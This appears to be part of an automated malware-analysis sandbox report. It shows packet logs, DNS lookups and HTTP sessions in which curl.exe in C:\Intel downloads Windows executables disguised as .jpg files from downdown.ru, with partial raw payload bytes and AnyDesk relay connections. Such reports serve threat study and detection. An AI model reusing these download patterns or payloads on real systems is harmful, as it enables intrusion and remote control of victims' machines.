                                                                                                                                                                  Jan 11, 2025 07:54:35.030436993 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.030555964 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.030647039 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.030778885 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.030864954 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.030870914 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.030988932 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031102896 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.031111956 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031259060 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031377077 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031497002 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031616926 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031729937 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.031743050 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031841040 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.031951904 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032075882 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032082081 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032221079 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032346010 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032459974 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032496929 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.032627106 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032732010 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032851934 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.032951117 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033073902 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033169031 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033288956 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033354998 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.033457994 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033530951 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033651114 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033771992 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.033893108 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034013987 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034132957 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034235954 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034383059 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034497023 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.034513950 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034635067 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034729958 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.034746885 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034868956 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.034962893 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035082102 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035131931 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035240889 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035361052 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035481930 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035629988 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035749912 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035758972 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:35.035883904 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.035993099 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.036113024 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.036214113 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.036330938 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.036448956 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.036561966 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.036784887 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:35.037065029 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037257910 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037343025 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.037357092 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037487984 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037606955 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037727118 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037847042 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037900925 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.037906885 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.039100885 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.039390087 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.039439917 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.039581060 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.039699078 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.039819956 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.039937973 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.040066004 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.040153980 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.040272951 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.040395975 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.040517092 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.040740013 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.044190884 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.044421911 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.044702053 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.048719883 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049005032 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:35.049053907 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049107075 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049118042 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049128056 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049315929 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049331903 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049341917 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049448013 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049479008 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049490929 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.049762011 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:35.052628994 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.052884102 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.052898884 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.052907944 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:35.053265095 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.053565025 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:35.053615093 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.053736925 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.053751945 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.053761959 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056026936 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056138039 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056277037 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056396008 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056421041 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.056480885 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056602955 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056721926 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056878090 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.056952953 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057073116 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057199955 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057362080 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057378054 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057487011 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057563066 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.057594061 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057691097 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057715893 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.057785034 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.057904959 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058026075 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058080912 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058197021 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058345079 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058459997 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.058474064 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058612108 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058712006 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058723927 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058825016 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.058944941 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059066057 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059070110 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.059197903 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059305906 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059429884 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059549093 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059604883 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059730053 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059853077 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059973955 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.059983015 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.060101986 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060218096 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060343027 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060457945 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060579062 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060698986 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060766935 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.060894012 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.061017036 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.061111927 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:35.061137915 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:35.061264038 CET4436519223.213.53.31192.168.11.20

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Jan 11, 2025 07:53:47.680308104 CET192.168.11.201.1.1.10x8a97Standard query (0)downdown.ruA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 11, 2025 07:54:02.868016958 CET192.168.11.201.1.1.10x36edStandard query (0)www.4t-niagara.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 11, 2025 07:54:05.437623978 CET192.168.11.201.1.1.10x3ab8Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 11, 2025 07:54:13.799091101 CET192.168.11.201.1.1.10xf72fStandard query (0)relay-30ea2fb5.net.anydesk.comA (IP address)IN (0x0001)false

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Jan 11, 2025 07:53:48.081686974 CET1.1.1.1192.168.11.200x8a97No error (0)downdown.ru185.125.51.5A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 11, 2025 07:54:03.064366102 CET1.1.1.1192.168.11.200x36edNo error (0)www.4t-niagara.com94.23.158.211A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 11, 2025 07:54:05.557204008 CET1.1.1.1192.168.11.200x3ab8No error (0)boot.net.anydesk.com57.129.37.157A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 11, 2025 07:54:13.918184042 CET1.1.1.1192.168.11.200xf72fNo error (0)relay-30ea2fb5.net.anydesk.com160.202.165.71A (IP address)IN (0x0001)false

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.11.2049754185.125.51.5804108C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:53:48.496963024 CET89OUTGET /driver.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:53:48.715313911 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:53:48 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 09:23:13 GMT
                                                                                                                                                                  ETag: "49400-62831fb300240"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 300032
                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                  Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7PELH0@@ gp.text0& `.data @F,@.tls`r@.rdatapt@P.idatav@@.edata@@.rsrc [TRUNCATED]
                                                                                                                                                                  Jan 11, 2025 07:53:48.715424061 CET1289INData Raw: 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: @@
                                                                                                                                                                  Jan 11, 2025 07:53:48.715540886 CET1289INData Raw: 8b d8 56 57 89 55 fc 8b f9 8b 73 04 ff 75 fc e8 ad a9 03 00 59 8b d0 42 8b c3 e8 6a 00 00 00 ff 75 fc 8b 0b 03 ce 51 e8 65 a9 03 00 83 c4 08 85 ff 74 49 66 83 3f 00 74 43 8b 43 24 89 45 f8 8d 43 20 ba 01 00 00 00 e8 8d 00 00 00 8b 4b 20 8b 45 f8
                                                                                                                                                                  Data Ascii: VWUsuYBjuQetIf?tCC$EC K E4SUCBECC0_^[]SVSC;C~>CyC ;C}sV3";uHDn%s^[SVSC;C~CCy
                                                                                                                                                                  Jan 11, 2025 07:53:48.715647936 CET1289INData Raw: 74 e3 8b c3 5b c3 90 90 53 8b d8 33 c0 8a c3 50 e8 0b 1d 04 00 5b c3 90 53 8b d8 33 c0 8a c3 50 e8 13 1d 04 00 5b c3 90 53 56 8b d8 83 fb 69 75 08 b8 49 00 00 00 5e 5b c3 8b f3 56 e8 27 ca 03 00 59 5e 5b c3 90 90 90 55 8b ec 51 53 56 57 89 55 fc
                                                                                                                                                                  Data Ascii: t[S3P[S3P[SViuI^[V'Y^[UQSVWU3@3 t8t}00|9N a|fNA|FN3x0|9_ a|f_A|F_3]B8u_^[Y]SVW
                                                                                                                                                                  Jan 11, 2025 07:53:48.715732098 CET1289INData Raw: 95 fc f7 ff ff 8b 45 fc e8 52 a0 00 00 8b c7 5f 5e 5b 8b e5 5d c3 90 53 56 8b da 8b f0 8b c6 e8 af 00 00 00 85 db 75 0a 85 c0 74 30 c6 00 00 5e 5b c3 85 c0 75 1b 68 6c 41 44 00 56 e8 62 9e 03 00 83 c4 08 53 56 e8 58 9e 03 00 83 c4 08 5e 5b c3 53
                                                                                                                                                                  Data Ascii: ER_^[]SVut0^[uhlADVbSVX^[S@P&^[SVtCf;t=ut.f^[unAD^[^[rAD^tf8tvADSV=DtD.
                                                                                                                                                                  Jan 11, 2025 07:53:48.715877056 CET1289INData Raw: 76 12 8b f3 eb 0e 4b 3b fb 73 09 33 c0 8a 03 83 f8 2e 75 a3 8b c6 5f 5e 5b 59 5d c3 90 90 55 8b ec 83 c4 f8 53 56 89 4d f8 89 55 fc 8b f0 8b c6 e8 95 fb ff ff 8b d8 85 c0 75 19 68 b3 41 44 00 56 e8 54 99 03 00 83 c4 08 8b c6 e8 7a fb ff ff 8b d8
                                                                                                                                                                  Data Ascii: vK;s3.u_^[Y]USVMUuhADVTz9{t"rADCtADCuhADKQ}uN40K;w3PZYuVY;tPH;uC1g3:tX3SRYt3
                                                                                                                                                                  Jan 11, 2025 07:53:48.715985060 CET1289INData Raw: e8 e4 c3 03 00 59 8b f0 80 7d fb 00 74 03 c6 03 00 85 ff 74 2b ba 3b 00 00 00 8b c7 e8 94 98 00 00 8b d8 85 db 74 19 85 f6 75 0a 8d 43 02 e8 ea 99 00 00 8b f0 80 7d fb 00 74 05 66 c7 03 00 00 8b c6 5f 5e 5b 59 59 5d c3 55 8b ec 50 b8 09 00 00 00
                                                                                                                                                                  Data Ascii: Y}tt+;tuC}tf_^[YY]UPPHuESVW;tPVut>1;sB3PdYt00uC]K;rAD:E3VRz
                                                                                                                                                                  Jan 11, 2025 07:53:48.716053963 CET1289INData Raw: 47 ff b5 20 ff ff ff 68 dd 41 44 00 8d 85 ec fa ff ff 50 e8 9c a7 03 00 83 c4 0c ff b5 24 ff ff ff 68 e4 41 44 00 8d 95 f1 fa ff ff 52 e8 82 a7 03 00 83 c4 0c ff b5 28 ff ff ff 68 e4 41 44 00 8d 8d f6 fa ff ff 51 e8 68 a7 03 00 83 c4 0c ff b5 2c
                                                                                                                                                                  Data Ascii: G hADP$hADR(hADQh,hADPN0hADR44hADQWhADPFVhADP@BRhADQ5DDhAD
                                                                                                                                                                  Jan 11, 2025 07:53:48.716191053 CET1289INData Raw: 33 d2 8b 03 e8 62 08 00 00 f7 c6 01 00 00 00 74 07 53 e8 ec 73 03 00 59 5e 5b c3 b8 48 8c 44 00 e8 be 07 03 00 b8 59 92 44 00 e8 88 bd 00 00 b8 5c 92 44 00 e8 96 b5 02 00 c3 b8 5c 92 44 00 ba 02 00 00 00 e8 a2 b5 02 00 b8 59 92 44 00 ba 02 00 00
                                                                                                                                                                  Data Ascii: 3btSsY^[HDYD\D\DYDcBD3@@f@@P3@@3@@@@SVt7BD{t{u{ttSsY^[U
                                                                                                                                                                  Jan 11, 2025 07:53:48.716290951 CET1289INData Raw: 17 50 e8 4b 86 03 00 83 c4 08 8b c7 e8 b5 e0 ff ff 8b d0 8d 86 18 04 00 00 e8 14 87 00 00 8b c3 5f 5e 5b 59 5d c3 55 8b ec 83 c4 e4 53 56 57 8b f1 89 55 fc 8b f8 85 f6 0f 84 a4 01 00 00 83 7f 0c 00 74 21 8b 47 0c 48 74 05 48 74 0e eb 16 6a f5 e8
                                                                                                                                                                  Data Ascii: PK_^[Y]USVWUt!GHtHtjbGjVGE3UtM3;~djEP+@}+@QEPw&Ut)@;jEPVuwM}
                                                                                                                                                                  Jan 11, 2025 07:53:48.933520079 CET1289INData Raw: d2 53 56 57 89 45 fc 8b 7d 08 8b f1 74 0d 83 3a 00 0f 95 c0 83 e0 01 84 c0 75 04 33 db eb 05 bb 01 00 00 00 85 f6 74 0d 83 3e 00 0f 95 c0 83 e0 01 84 c0 75 04 33 c9 eb 05 b9 01 00 00 00 88 4d fb 85 ff 74 0d 83 3f 00 0f 95 c0 83 e0 01 84 c0 75 04
                                                                                                                                                                  Data Ascii: SVWE}t:u3t>u3Mt?u3MtE}tUu}tUetM3Q}tE3P}tU3REp_^[]USURjjpwUY


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.11.2049755185.125.51.5806188C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:53:50.167802095 CET87OUTGET /blat.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:53:50.389619112 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:53:50 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 09:23:13 GMT
                                                                                                                                                                  ETag: "3c000-62831fb300240"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 245760
                                                                                                                                                                  Content-Type: image/jpeg
